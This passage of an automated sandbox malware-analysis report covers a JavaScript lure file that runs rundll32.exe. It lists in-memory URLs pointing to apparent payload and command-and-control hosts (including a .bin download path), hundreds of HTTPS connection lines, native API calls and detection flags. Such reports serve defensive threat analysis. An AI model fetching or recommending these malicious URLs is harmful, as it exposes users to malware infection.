Source: rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/files/stkm.bin
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/(y
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/J$=W
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/OIDV6SW/
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/P
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/dll
Source: rundll32.exe, 00000006.00000003.2790535697.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/l
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/s6
Source: rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.c
Source: rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4788197767.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/
Source: rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/(h)W$
Source: rundll32.exe, 00000006.00000003.5965951373.000001800FF41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/4g9V
Source: rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/=0
Source: rundll32.exe, 00000006.00000003.6962520365.000001800FF45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/Pb
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/d
Source: rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3042728036.0000018010070000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/My
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/ll
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.advancedinstaller.com
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repo
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.10:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.34:443 -> 192.168.2.4:49800 version: TLS 1.2
Drops certificate files (DER)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560 Jump to dropped file

System Summary
barindex
Sample has a suspicious name (potential lure to open the executable)
Source: Document_a51_19i793302-14b09981a5569-3684u8.js Static file information: Suspicious name
Abnormal high CPU Usage
Source: C:\Windows\System32\rundll32.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEB0C4 NtOpenKey,RtlpNtOpenKey, 5_2_00000235B5CEB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 5_2_00000235B5CEB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEAD34 NtAllocateVirtualMemory, 5_2_00000235B5CEAD34
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE78C0 NtReadFile, 5_2_00000235B5CE78C0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE77B0 RtlInitUnicodeString,NtCreateFile, 5_2_00000235B5CE77B0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7B40 NtFreeVirtualMemory, 5_2_00000235B5CE7B40
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7A54 NtWriteFile, 5_2_00000235B5CE7A54
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE79C8 NtClose, 5_2_00000235B5CE79C8
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7588 RtlInitUnicodeString,NtCreateFile,NtClose, 5_2_00000235B5CE7588
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE378C NtClose, 5_2_00000235B5CE378C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification, 5_2_00000235B5CE463C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7ACC NtClose, 5_2_00000235B5CE7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE745C RtlInitUnicodeString,NtOpenFile,NtClose, 5_2_00000235B5CE745C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7704 NtQueryInformationFile, 5_2_00000235B5CE7704
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE7694 RtlInitUnicodeString,NtDeleteFile, 5_2_00000235B5CE7694
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CECB54 NtDelayExecution, 5_2_00000235B5CECB54
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CF0AF0 NtWriteFile, 5_2_00000235B5CF0AF0
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031241C NtAllocateVirtualMemory, 6_3_000001801031241C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001801031248C NtFreeVirtualMemory, 6_3_000001801031248C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BAD34 NtAllocateVirtualMemory, 7_2_000001EF532BAD34
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7B40 NtFreeVirtualMemory, 7_2_000001EF532B7B40
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle, 7_2_000001EF532B463C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7588 RtlInitUnicodeString,NtCreateFile,NtClose, 7_2_000001EF532B7588
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B378C NtClose, 7_2_000001EF532B378C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B745C RtlInitUnicodeString,NtOpenFile,NtClose, 7_2_000001EF532B745C
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BCB54 NtDelayExecution, 7_2_000001EF532BCB54
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7A54 NtWriteFile, 7_2_000001EF532B7A54
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B77B0 RtlInitUnicodeString,NtCreateFile, 7_2_000001EF532B77B0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B79C8 NtClose, 7_2_000001EF532B79C8
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7ACC NtClose, 7_2_000001EF532B7ACC
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B78C0 NtReadFile, 7_2_000001EF532B78C0
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BB0C4 NtOpenKey, 7_2_000001EF532BB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7694 RtlInitUnicodeString,NtDeleteFile, 7_2_000001EF532B7694
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532B7704 NtQueryInformationFile, 7_2_000001EF532B7704
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_000001EF532BB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 7_2_000001EF532BB1D4
Contains functionality to communicate with device drivers
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018006A2C8: DeviceIoControl, 5_2_000000018006A2C8
Contains functionality to launch a process as a different user
